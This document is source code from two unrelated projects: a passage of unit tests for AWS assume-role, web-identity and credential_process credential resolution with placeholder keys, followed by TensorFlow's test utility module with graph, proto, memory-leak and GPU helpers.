'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env, we
# should only be looking at the profile so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring: b'
# The reason why we want to validate that is that we want to
# make sure that stderr is actually decoded so that in
# exceptional cases the error is properly formatted.
# As for how the regex works:
# `(?!b').` is a negative lookahead, meaning that it will only
# match if it is not followed by the pattern `b'`. Since it is
# followed by a `.` it will match any character not followed by
        # that pattern. `((?!b').)*` does that zero or more times. The
# final pattern adds `^` and `$` to anchor the beginning and end
# of the string so we can know the whole string is consumed.
# Finally `(?s)` at the beginning makes dots match newlines so
# we can handle a multi-line string.
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegexp(CredentialRetrievalError, reg):
session.get_credentials()
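# A minimal illustration (not part of the original test suite) of the
# negative-lookahead regex documented above: it matches only strings that
# contain no b' substring, i.e. stderr output that was properly decoded.
def _example_no_bytes_repr_regex():
    import re
    reg = r"(?s)^((?!b').)*$"
    assert re.search(reg, "decoded\nerror message") is not None
    assert re.search(reg, "leaked bytes repr: b'raw'") is None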
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
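# Illustrative sketch (not part of the original module): assert_ops_in_graph
# checks op types by node name in a freshly built graph and returns the
# matching NodeDefs.
def _example_assert_ops_in_graph():
  with ops.Graph().as_default() as g:
    array_ops.placeholder(dtypes.float32, name="x")
    return assert_ops_in_graph({"x": "Placeholder"}, g)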
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
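# Shape-only sketch (not part of the original file): for an NHWC shape
# [batch, height, width, channels], the converted NCHW shape is
# [batch, channels, height, width].
def _example_nhwc_to_nchw_shape():
  assert NHWCToNCHW([32, 8, 8, 3]) == [32, 3, 8, 8]
  return NHWCToNCHW([32, 8, 8, 3])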
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
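# Round-trip sketch on plain shape lists (not part of the original file): an
# NHWC shape whose channel count is divisible by 4 converts to NCHW_VECT_C and
# back. Note that NHWCToNCHW_VECT_C mutates a Python list argument in place,
# so a fresh literal is passed here.
def _example_vect_c_round_trip():
  vect_c = NHWCToNCHW_VECT_C([2, 8, 8, 8])  # [2, 2, 8, 8, 4]
  assert NCHW_VECT_CToNHWC(vect_c) == [2, 8, 8, 8]
  return vect_c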
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
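# Usage sketch (hypothetical helper, not part of the original file): the
# decorated function body only runs when the condition is falsy; note that
# skip_if's wrapper discards the wrapped function's return value.
def _example_skip_if_usage():
  @skip_if(lambda: not is_gpu_available())
  def _log_gpu_name():
    logging.info("GPU device: %s", gpu_device_name())
  _log_gpu_name()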
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
# Only use C shapes if the C API is already enabled.
ops._USE_C_SHAPES = ops._USE_C_API
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
  Useful for checking that there are no missing Py_DECREFs in the C code
  exercised by a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
for _ in range(3):
f(self, **kwargs)
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
      # In some cases (specifically on macOS), new_count is somehow
      # smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" % (
new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
          # TODO(xpan): Support soft placement and GPU by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
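# Sketch (not part of the original file): build an op on the GPU when one is
# available, falling back to CPU otherwise, via the device() helper above.
def _example_device_usage():
  with device(use_gpu=True):
    return array_ops.zeros([2, 2])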
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests run at different times will not be
    able to pollute each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
      self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
